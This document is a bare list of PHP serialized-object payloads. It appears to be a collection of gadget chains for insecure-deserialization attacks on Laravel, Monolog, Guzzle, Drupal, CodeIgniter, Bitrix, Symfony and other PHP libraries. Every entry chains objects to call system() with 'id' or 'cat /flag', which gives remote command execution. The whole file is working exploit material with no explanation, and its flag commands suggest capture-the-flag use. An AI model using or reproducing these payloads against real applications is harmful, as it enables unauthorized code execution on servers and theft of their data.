O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:"GuzzleHttp\Psr7\FnStreammethods";a:1:{s:10:"__toString";a:2:{i:0;O:39:"Pydio\Core\Controller\ShutdownScheduler":1:{s:50:"Pydio\Core\Controller\ShutdownSchedulercallbacks";a:1:{i:0;a:2:{i:0;s:6:"system";i:1;s:2:"id";}}}i:1;s:22:"callRegisteredShutdown";}}s:14:"_fn___toString";a:2:{i:0;O:39:"Pydio\Core\Controller\ShutdownScheduler":1:{s:50:"Pydio\Core\Controller\ShutdownSchedulercallbacks";a:1:{i:0;a:2:{i:0;s:6:"system";i:1;s:2:"id";}}}i:1;s:22:"callRegisteredShutdown";}}
O:31:"League\Plates\Template\Template":2:{s:7:"*name";s:2:"id";s:9:"*engine";O:31:"League\Plates\Template\Template":2:{s:7:"*name";N;s:9:"*engine";O:20:"League\Plates\Engine":1:{s:12:"*functions";O:32:"League\Plates\Template\Functions":1:{s:12:"*functions";a:1:{s:22:"getResolveTemplatePath";O:27:"League\Plates\Template\Func":2:{s:11:"*callback";a:2:{i:0;r:8;i:1;s:7:"getName";}s:7:"*name";s:6:"system";}}}}}}
O:30:"GuzzleHttp\Handler\CurlFactory":1:{s:39:"GuzzleHttp\Handler\CurlFactoryhandles";O:19:"Aws\ResultPaginator":4:{s:27:"Aws\ResultPaginatorclient";O:28:"Opencart\System\Engine\Proxy":1:{s:7:"*data";a:2:{s:10:"getCommand";s:6:"system";s:7:"execute";s:7:"print_r";}}s:27:"Aws\ResultPaginatorconfig";a:1:{s:12:"output_token";b:0;}s:30:"Aws\ResultPaginatoroperation";s:2:"id";s:25:"Aws\ResultPaginatorargs";a:0:{}}}
O:33:"Opencart\System\Library\DB\mysqli":1:{s:45:"Opencart\System\Library\DB\mysqliconnection";O:31:"Opencart\System\Library\Session":2:{s:10:"*adaptor";O:28:"Opencart\System\Engine\Proxy":1:{s:7:"*data";a:1:{s:5:"write";s:6:"system";}}s:13:"*session_id";s:2:"id";}}
O:37:"Monolog\Handler\FingersCrossedHandler":4:{s:16:"*passthruLevel";E:19:"Monolog\Level:Debug";s:10:"*handler";r:1;s:9:"*buffer";a:1:{i:0;O:17:"Monolog\LogRecord":2:{s:5:"level";r:2;s:5:"mixed";s:2:"id";}}s:13:"*processors";a:3:{i:0;s:15:"get_object_vars";i:1;s:3:"end";i:2;s:6:"system";}}
O:28:"Monolog\Handler\GroupHandler":1:{s:11:"*handlers";a:1:{i:0;O:29:"Monolog\Handler\BufferHandler":6:{s:10:"*handler";r:3;s:13:"*bufferSize";i:1;s:14:"*bufferLimit";i:0;s:9:"*buffer";a:1:{i:0;O:17:"Monolog\LogRecord":2:{s:5:"level";E:19:"Monolog\Level:Debug";s:5:"mixed";s:2:"id";}}s:14:"*initialized";b:1;s:13:"*processors";a:3:{i:0;s:15:"get_object_vars";i:1;s:3:"end";i:2;s:6:"system";}}}}
O:37:"Monolog\Handler\FingersCrossedHandler":4:{s:16:"*passthruLevel";i:0;s:10:"*handler";r:1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:2:"id";s:5:"level";i:0;}}s:13:"*processors";a:2:{i:0;s:3:"pos";i:1;s:6:"system";}}
O:37:"Monolog\Handler\FingersCrossedHandler":3:{s:16:"*passthruLevel";i:0;s:9:"*buffer";a:1:{s:4:"test";a:2:{i:0;s:2:"id";s:5:"level";N;}}s:10:"*handler";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";N;s:13:"*bufferSize";i:-1;s:9:"*buffer";N;s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
O:37:"Monolog\Handler\FingersCrossedHandler":3:{s:16:"*passthruLevel";i:0;s:9:"*buffer";a:1:{s:4:"test";a:2:{i:0;s:2:"id";s:5:"level";N;}}s:10:"*handler";O:28:"Monolog\Handler\GroupHandler":1:{s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";O:35:"Monolog\Handler\NativeMailerHandler":7:{s:5:"*to";N;s:10:"*subject";N;s:10:"*headers";N;s:8:"*level";N;s:9:"*bubble";b:0;s:12:"*formatter";N;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:2:"id";s:5:"level";N;}}s:8:"*level";N;s:9:"*bubble";b:0;s:12:"*formatter";N;s:13:"*processors";N;}
O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:6:"socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:2;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:2:"id";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"*socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:2;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:2:"id";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:41:"League\CommonMark\Environment\Environment":2:{s:64:"League\CommonMark\Environment\EnvironmentextensionsInitialized";b:1;s:55:"League\CommonMark\Environment\EnvironmentlistenerData";O:38:"League\CommonMark\Util\PrioritizedList":1:{s:44:"League\CommonMark\Util\PrioritizedListlist";a:1:{i:0;a:1:{i:0;O:36:"League\CommonMark\Event\ListenerData":2:{s:43:"League\CommonMark\Event\ListenerDataevent";s:32:"\Illuminate\Broadcasting\Channel";s:46:"League\CommonMark\Event\ListenerDatalistener";O:54:"Illuminate\Support\Testing\Fakes\ChainedBatchTruthTest":1:{s:11:"*callback";s:6:"system";}}}}}}s:8:"*event";O:31:"Illuminate\Broadcasting\Channel":1:{s:4:"name";s:2:"id";}}
O:27:"Swift_KeyCache_DiskKeyCache":2:{s:34:"Swift_KeyCache_DiskKeyCache_keys";a:1:{s:12:"fallingskies";a:1:{s:12:"fallingskies";s:12:"fallingskies";}}s:34:"Swift_KeyCache_DiskKeyCache_path";O:36:"Mockery\Generator\DefinedTargetClass":1:{s:41:"Mockery\Generator\DefinedTargetClassrfc";O:20:"Faker\ValidGenerator":3:{s:12:"*generator";O:22:"Faker\DefaultGenerator":1:{s:10:"*default";s:2:"id";}s:12:"*validator";s:6:"system";s:13:"*maxRetries";i:9;}}}
O:46:"Illuminate\Routing\PendingResourceRegistration":3:{s:12:"*registrar";O:36:"Illuminate\Routing\ResourceRegistrar":1:{s:9:"*router";N;}s:7:"*name";O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:{i:0;O:28:"Illuminate\Auth\RequestGuard":3:{s:11:"*callback";s:6:"system";s:10:"*request";s:2:"id";s:11:"*provider";i:1;}i:1;s:4:"user";}}s:13:"*registered";b:0;}
O:55:"Illuminate\Routing\PendingSingletonResourceRegistration":4:{s:12:"*registrar";O:35:"Illuminate\Database\DatabaseManager":3:{s:6:"*app";a:1:{s:6:"config";a:2:{s:16:"database.default";s:6:"system";s:20:"database.connections";a:1:{s:6:"system";s:3:"aid";}}}s:10:"*factory";s:8:"anything";s:13:"*extensions";a:1:{s:6:"system";s:12:"array_filter";}}s:7:"*name";s:4:"name";s:13:"*controller";s:10:"controller";s:10:"*options";a:0:{}}
O:35:"Monolog\Handler\RotatingFileHandler":4:{s:13:"*mustRotate";b:1;s:11:"*filename";s:8:"anything";s:17:"*filenameFormat";O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:{i:0;O:28:"Illuminate\Auth\RequestGuard":3:{s:11:"*callback";s:14:"call_user_func";s:10:"*request";s:6:"system";s:11:"*provider";s:2:"id";}i:1;s:4:"user";}}s:13:"*dateFormat";s:1:"l";}
O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"*events";O:29:"Illuminate\Queue\QueueManager":2:{s:6:"*app";a:1:{s:6:"config";a:2:{s:13:"queue.default";s:3:"key";s:21:"queue.connections.key";a:1:{s:6:"driver";s:4:"func";}}}s:13:"*connectors";a:1:{s:4:"func";a:2:{i:0;O:28:"Illuminate\Auth\RequestGuard":3:{s:11:"*callback";s:14:"call_user_func";s:10:"*request";s:6:"system";s:11:"*provider";s:2:"id";}i:1;s:4:"user";}}}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"*events";O:20:"Faker\ValidGenerator":3:{s:12:"*generator";O:22:"Faker\DefaultGenerator":1:{s:10:"*default";s:2:"id";}s:13:"*maxRetries";i:1;s:12:"*validator";s:6:"system";}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"*events";O:35:"Illuminate\Database\DatabaseManager":2:{s:6:"*app";a:1:{s:6:"config";a:2:{s:16:"database.default";s:6:"system";s:20:"database.connections";a:1:{s:6:"system";a:1:{i:0;s:2:"id";}}}}s:13:"*extensions";a:1:{s:6:"system";s:12:"array_filter";}}}
O:30:"Monolog\Handler\RollbarHandler":2:{s:42:"Monolog\Handler\RollbarHandlerhasRecords";b:1;s:16:"*rollbarLogger";O:60:"Illuminate\Foundation\Support\Providers\RouteServiceProvider":1:{s:6:"*app";O:23:"Illuminate\View\Factory":1:{s:9:"*finder";O:37:"Symfony\Component\Console\Application":3:{s:50:"Symfony\Component\Console\Applicationinitialized";b:1;s:47:"Symfony\Component\Console\Applicationcommands";a:1:{i:0;O:33:"Illuminate\Foundation\AliasLoader":1:{s:10:"*aliases";a:1:{i:0;s:3:"key";}}}s:52:"Symfony\Component\Console\ApplicationcommandLoader";O:27:"Illuminate\Cache\Repository":1:{s:8:"*store";O:20:"PhpOption\LazyOption":3:{s:28:"PhpOption\LazyOptionoption";N;s:30:"PhpOption\LazyOptioncallback";s:6:"system";s:31:"PhpOption\LazyOptionarguments";a:1:{i:0;s:2:"id";}}}}}}}
O:37:"Symfony\Component\Mime\Part\SMimePart":3:{s:49:"Symfony\Component\Mime\Part\AbstractPartheaders";N;s:11:"*_headers";a:1:{s:8:"dispatch";s:6:"system";}s:6:"inhann";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:5:"event";s:2:"id";s:6:"events";O:15:"Faker\Generator":1:{s:13:"*formatters";R:2;}}}
O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:{i:0;O:28:"Illuminate\Auth\RequestGuard":3:{s:8:"callback";s:14:"call_user_func";s:7:"request";s:6:"system";s:8:"provider";s:2:"id";}i:1;s:4:"user";}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:25:"Illuminate\Bus\Dispatcher":5:{s:12:"*container";N;s:11:"*pipeline";N;s:8:"*pipes";a:0:{}s:11:"*handlers";a:0:{}s:16:"*queueResolver";s:6:"system";}s:8:"*event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";s:2:"id";}}
O:31:"GuzzleHttp\Cookie\FileCookieJar":1:{s:41:"GuzzleHttp\Cookie\FileCookieJarfilename";O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:{i:0;O:20:"PhpOption\LazyOption":2:{s:30:"PhpOption\LazyOptioncallback";s:6:"system";s:31:"PhpOption\LazyOptionarguments";a:1:{i:0;s:2:"id";}}i:1;s:3:"get";}}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"*queueResolver";s:6:"system";}s:8:"*event";O:34:"Illuminate\Queue\CallQueuedClosure":1:{s:13:"*connection";s:2:"id";}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"*event";s:2:"id";}
O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"*events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"*app";s:2:"id";s:17:"*defaultChannel";s:1:"x";s:17:"*customCreators";a:1:{s:1:"x";s:6:"system";}}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"*listeners";a:1:{s:2:"id";a:1:{i:0;s:6:"system";}}}s:8:"*event";s:2:"id";}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:15:"Faker\Generator":1:{s:13:"*formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"*event";s:2:"id";}
O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:"GuzzleHttp\Psr7\FnStreammethods";a:1:{s:5:"close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:"GuzzleHttp\HandlerStackhandler";s:2:"id";s:30:"GuzzleHttp\HandlerStackstack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"GuzzleHttp\HandlerStackcached";b:0;}i:1;s:7:"resolve";}}s:9:"_fn_close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:"GuzzleHttp\HandlerStackhandler";s:2:"id";s:30:"GuzzleHttp\HandlerStackstack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"GuzzleHttp\HandlerStackcached";b:0;}i:1;s:7:"resolve";}}
O:31:"GuzzleHttp\Cookie\FileCookieJar":1:{s:41:"GuzzleHttp\Cookie\FileCookieJarfilename";O:32:"Laminas\Diactoros\RelativeStream":1:{s:49:"Laminas\Diactoros\RelativeStreamdecoratedStream";O:26:"GuzzleHttp\Psr7\PumpStream":2:{s:34:"GuzzleHttp\Psr7\PumpStreamsource";s:1:"1";s:34:"GuzzleHttp\Psr7\PumpStreambuffer";O:32:"Drupal\Core\Config\CachedStorage":2:{s:10:"*storage";O:32:"Drupal\Core\Config\MemoryStorage":1:{s:13:"*collection";s:0:"";}s:8:"*cache";O:46:"Drupal\Component\DependencyInjection\Container":1:{s:21:"*serviceDefinitions";a:1:{i:1000000;s:68:"a:2:{s:7:"factory";s:6:"system";s:9:"arguments";a:1:{i:0;s:2:"id";}}";}}}}}}
O:11:"SchemaCache":4:{s:6:"*cid";s:14:"form_DrupalRCE";s:6:"*bin";s:10:"cache_form";s:16:"*keysToPersist";a:3:{s:8:"#form_id";b:1;s:8:"#process";b:1;s:9:"#attached";b:1;}s:10:"*storage";a:3:{s:8:"#form_id";s:9:"DrupalRCE";s:8:"#process";a:1:{i:0;s:23:"drupal_process_attached";}s:9:"#attached";a:1:{s:6:"system";a:1:{i:0;a:1:{i:0;s:2:"id";}}}}}
O:27:"Bitrix\Main\ORM\Data\Result":3:{s:9:"*errors";O:27:"Bitrix\Main\Type\Dictionary":1:{s:9:"*values";a:1:{i:0;O:17:"Bitrix\Main\Error":1:{s:10:"*message";O:36:"Bitrix\Main\UI\Viewer\ItemAttributes":1:{s:13:"*attributes";O:29:"Bitrix\Main\DB\ResultIterator":3:{s:38:"Bitrix\Main\DB\ResultIteratorcounter";i:0;s:42:"Bitrix\Main\DB\ResultIteratorcurrentData";i:0;s:37:"Bitrix\Main\DB\ResultIteratorresult";O:26:"Bitrix\Main\DB\ArrayResult":2:{s:11:"*resource";a:2:{i:0;a:1:{i:0;s:9:"cat /flag";}i:1;a:1:{i:0;a:1:{i:0;s:3:"rce";}}}s:13:"*converters";a:2:{i:0;s:6:"system";i:1;s:17:"WriteFinalMessage";}}}}}}}s:12:"*isSuccess";b:0;s:20:"*wereErrorsChecked";b:0;}
O:33:"Symfony\Component\Process\Process":4:{s:42:"Symfony\Component\Process\Processoptions";a:1:{s:18:"create_new_console";i:0;}s:47:"Symfony\Component\Process\ProcessprocessPipes";O:14:"Cake\ORM\Table":1:{s:13:"*_behaviors";O:25:"Cake\ORM\BehaviorRegistry":2:{s:13:"*_methodMap";a:1:{s:12:"readandwrite";a:2:{i:0;s:2:"mb";i:1;s:5:"fetch";}}s:10:"*_loaded";a:1:{s:2:"mb";O:41:"Cake\Database\Statement\CallbackStatement":2:{s:12:"*_callback";s:6:"system";s:13:"*_statement";O:41:"Cake\Database\Statement\BufferedStatement":3:{s:14:"*_allFetched";i:1;s:9:"*buffer";a:1:{i:0;s:9:"cat /flag";}s:8:"*index";i:0;}}}}}s:41:"Symfony\Component\Process\Processstatus";s:7:"started";s:42:"Symfony\Component\Process\Processprocess";i:1;}
O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":8:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":2:{s:6:"QBFrom";a:1:{i:0;s:2:"()";}s:2:"db";O:38:"CodeIgniter\Database\MySQLi\Connection":0:{}}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:4:"id.x";a:1:{s:5:"rules";a:2:{i:0;s:6:"system";i:1;s:2:"dd";}}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}s:21:"*tempAllowCallbacks";i:1;s:2:"db";O:38:"CodeIgniter\Database\MySQLi\Connection":0:{}s:20:"cleanValidationRules";b:0;}s:10:"*lockKey";a:1:{s:1:"x";s:9:"cat /flag";}}}
O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:20:"Faker\ValidGenerator":3:{s:12:"*generator";O:22:"Faker\DefaultGenerator":1:{s:10:"*default";s:9:"cat /flag";}s:12:"*validator";s:6:"system";s:13:"*maxRetries";i:1;}}
O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":5:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:2:"id";a:1:{i:0;s:6:"system";}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:9:"cat /flag";}}
O:34:"Predis\Connection\StreamConnection":1:{s:13:"*parameters";O:25:"CodeIgniter\Entity\Entity":1:{s:10:"*datamap";a:1:{s:10:"persistent";O:40:"Symfony\Component\HttpFoundation\Request":2:{s:6:"server";O:61:"Symfony\Component\DependencyInjection\Argument\ServiceLocator":2:{s:73:"Symfony\Component\DependencyInjection\Argument\ServiceLocatorserviceMap";a:1:{s:14:"REQUEST_METHOD";a:2:{i:0;s:6:"system";i:1;s:9:"cat /flag";}}s:70:"Symfony\Component\DependencyInjection\Argument\ServiceLocatorfactory";s:14:"call_user_func";}s:7:"cookies";a:1:{s:3:"key";s:5:"value";}}}}}
O:34:"Predis\Response\Iterator\MultiBulk":3:{s:11:"*position";i:0;s:7:"*size";i:1;s:46:"Predis\Response\Iterator\MultiBulkconnection";O:20:"Faker\ValidGenerator":3:{s:12:"*generator";O:22:"Faker\DefaultGenerator":1:{s:10:"*default";s:9:"cat /flag";}s:13:"*maxRetries";i:1;s:12:"*validator";s:6:"system";}}
O:39:"Doctrine\Common\Cache\Psr6\CacheAdapter":2:{s:13:"deferredItems";a:1:{i:0;O:41:"Symfony\Component\Cache\Traits\RedisProxy":2:{s:5:"redis";s:9:"cat /flag";s:11:"initializer";O:61:"Doctrine\Bundle\DoctrineBundle\Dbal\SchemaAssetsFilterManager":1:{s:18:"schemaAssetFilters";a:1:{i:0;s:6:"system";}}}}s:6:"loader";i:1;}
O:11:"SchemaCache":4:{s:6:"*cid";s:14:"form_DrupalRCE";s:6:"*bin";s:10:"cache_form";s:16:"*keysToPersist";a:3:{s:8:"#form_id";b:1;s:8:"#process";b:1;s:9:"#attached";b:1;}s:10:"*storage";a:3:{s:8:"#form_id";s:9:"DrupalRCE";s:8:"#process";a:1:{i:0;s:23:"drupal_process_attached";}s:9:"#attached";a:1:{s:6:"system";a:1:{i:0;a:1:{i:0;s:9:"cat /flag";}}}}}
O:31:"GuzzleHttp\Cookie\FileCookieJar":1:{s:41:"GuzzleHttp\Cookie\FileCookieJarfilename";O:32:"Laminas\Diactoros\RelativeStream":1:{s:49:"Laminas\Diactoros\RelativeStreamdecoratedStream";O:26:"GuzzleHttp\Psr7\PumpStream":2:{s:34:"GuzzleHttp\Psr7\PumpStreamsource";s:1:"1";s:34:"GuzzleHttp\Psr7\PumpStreambuffer";O:32:"Drupal\Core\Config\CachedStorage":2:{s:10:"*storage";O:32:"Drupal\Core\Config\MemoryStorage":1:{s:13:"*collection";s:0:"";}s:8:"*cache";O:46:"Drupal\Component\DependencyInjection\Container":1:{s:21:"*serviceDefinitions";a:1:{i:1000000;s:75:"a:2:{s:7:"factory";s:6:"system";s:9:"arguments";a:1:{i:0;s:9:"cat /flag";}}";}}}}}}
O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:"GuzzleHttp\Psr7\FnStreammethods";a:1:{s:5:"close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:"GuzzleHttp\HandlerStackhandler";s:9:"cat /flag";s:30:"GuzzleHttp\HandlerStackstack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"GuzzleHttp\HandlerStackcached";b:0;}i:1;s:7:"resolve";}}s:9:"_fn_close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:"GuzzleHttp\HandlerStackhandler";s:9:"cat /flag";s:30:"GuzzleHttp\HandlerStackstack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"GuzzleHttp\HandlerStackcached";b:0;}i:1;s:7:"resolve";}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:15:"Faker\Generator":1:{s:13:"*formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"*event";s:9:"cat /flag";}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"*listeners";a:1:{s:9:"cat /flag";a:1:{i:0;s:6:"system";}}}s:8:"*event";s:9:"cat /flag";}
O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"*events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"*app";s:9:"cat /flag";s:17:"*defaultChannel";s:1:"x";s:17:"*customCreators";a:1:{s:1:"x";s:6:"system";}}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"*event";s:9:"cat /flag";}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"*queueResolver";s:6:"system";}s:8:"*event";O:34:"Illuminate\Queue\CallQueuedClosure":1:{s:13:"*connection";s:9:"cat /flag";}}
O:31:"GuzzleHttp\Cookie\FileCookieJar":1:{s:41:"GuzzleHttp\Cookie\FileCookieJarfilename";O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:{i:0;O:20:"PhpOption\LazyOption":2:{s:30:"PhpOption\LazyOptioncallback";s:6:"system";s:31:"PhpOption\LazyOptionarguments";a:1:{i:0;s:9:"cat /flag";}}i:1;s:3:"get";}}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:25:"Illuminate\Bus\Dispatcher":5:{s:12:"*container";N;s:11:"*pipeline";N;s:8:"*pipes";a:0:{}s:11:"*handlers";a:0:{}s:16:"*queueResolver";s:6:"system";}s:8:"*event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";s:9:"cat /flag";}}
O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:{i:0;O:28:"Illuminate\Auth\RequestGuard":3:{s:8:"callback";s:14:"call_user_func";s:7:"request";s:6:"system";s:8:"provider";s:9:"cat /flag";}i:1;s:4:"user";}}
O:37:"Symfony\Component\Mime\Part\SMimePart":3:{s:49:"Symfony\Component\Mime\Part\AbstractPartheaders";N;s:11:"*_headers";a:1:{s:8:"dispatch";s:6:"system";}s:6:"inhann";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:5:"event";s:9:"cat /flag";s:6:"events";O:15:"Faker\Generator":1:{s:13:"*formatters";R:2;}}}
O:30:"Monolog\Handler\RollbarHandler":2:{s:42:"Monolog\Handler\RollbarHandlerhasRecords";b:1;s:16:"*rollbarLogger";O:60:"Illuminate\Foundation\Support\Providers\RouteServiceProvider":1:{s:6:"*app";O:23:"Illuminate\View\Factory":1:{s:9:"*finder";O:37:"Symfony\Component\Console\Application":3:{s:50:"Symfony\Component\Console\Applicationinitialized";b:1;s:47:"Symfony\Component\Console\Applicationcommands";a:1:{i:0;O:33:"Illuminate\Foundation\AliasLoader":1:{s:10:"*aliases";a:1:{i:0;s:3:"key";}}}s:52:"Symfony\Component\Console\ApplicationcommandLoader";O:27:"Illuminate\Cache\Repository":1:{s:8:"*store";O:20:"PhpOption\LazyOption":3:{s:28:"PhpOption\LazyOptionoption";N;s:30:"PhpOption\LazyOptioncallback";s:6:"system";s:31:"PhpOption\LazyOptionarguments";a:1:{i:0;s:9:"cat /flag";}}}}}}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"*events";O:35:"Illuminate\Database\DatabaseManager":2:{s:6:"*app";a:1:{s:6:"config";a:2:{s:16:"database.default";s:6:"system";s:20:"database.connections";a:1:{s:6:"system";a:1:{i:0;s:9:"cat /flag";}}}}s:13:"*extensions";a:1:{s:6:"system";s:12:"array_filter";}}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"*events";O:20:"Faker\ValidGenerator":3:{s:12:"*generator";O:22:"Faker\DefaultGenerator":1:{s:10:"*default";s:9:"cat /flag";}s:13:"*maxRetries";i:1;s:12:"*validator";s:6:"system";}}
O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"*events";O:29:"Illuminate\Queue\QueueManager":2:{s:6:"*app";a:1:{s:6:"config";a:2:{s:13:"queue.default";s:3:"key";s:21:"queue.connections.key";a:1:{s:6:"driver";s:4:"func";}}}s:13:"*connectors";a:1:{s:4:"func";a:2:{i:0;O:28:"Illuminate\Auth\RequestGuard":3:{s:11:"*callback";s:14:"call_user_func";s:10:"*request";s:6:"system";s:11:"*provider";s:9:"cat /flag";}i:1;s:4:"user";}}}}
O:35:"Monolog\Handler\RotatingFileHandler":4:{s:13:"*mustRotate";b:1;s:11:"*filename";s:8:"anything";s:17:"*filenameFormat";O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:{i:0;O:28:"Illuminate\Auth\RequestGuard":3:{s:11:"*callback";s:14:"call_user_func";s:10:"*request";s:6:"system";s:11:"*provider";s:9:"cat /flag";}i:1;s:4:"user";}}s:13:"*dateFormat";s:1:"l";}
O:55:"Illuminate\Routing\PendingSingletonResourceRegistration":4:{s:12:"*registrar";O:35:"Illuminate\Database\DatabaseManager":3:{s:6:"*app";a:1:{s:6:"config";a:2:{s:16:"database.default";s:6:"system";s:20:"database.connections";a:1:{s:6:"system";s:10:"acat /flag";}}}s:10:"*factory";s:8:"anything";s:13:"*extensions";a:1:{s:6:"system";s:12:"array_filter";}}s:7:"*name";s:4:"name";s:13:"*controller";s:10:"controller";s:10:"*options";a:0:{}}
O:46:"Illuminate\Routing\PendingResourceRegistration":3:{s:12:"*registrar";O:36:"Illuminate\Routing\ResourceRegistrar":1:{s:9:"*router";N;}s:7:"*name";O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:{i:0;O:28:"Illuminate\Auth\RequestGuard":3:{s:11:"*callback";s:6:"system";s:10:"*request";s:9:"cat /flag";s:11:"*provider";i:1;}i:1;s:4:"user";}}s:13:"*registered";b:0;}
O:27:"Swift_KeyCache_DiskKeyCache":2:{s:34:"Swift_KeyCache_DiskKeyCache_keys";a:1:{s:12:"fallingskies";a:1:{s:12:"fallingskies";s:12:"fallingskies";}}s:34:"Swift_KeyCache_DiskKeyCache_path";O:36:"Mockery\Generator\DefinedTargetClass":1:{s:41:"Mockery\Generator\DefinedTargetClassrfc";O:20:"Faker\ValidGenerator":3:{s:12:"*generator";O:22:"Faker\DefaultGenerator":1:{s:10:"*default";s:9:"cat /flag";}s:12:"*validator";s:6:"system";s:13:"*maxRetries";i:9;}}}
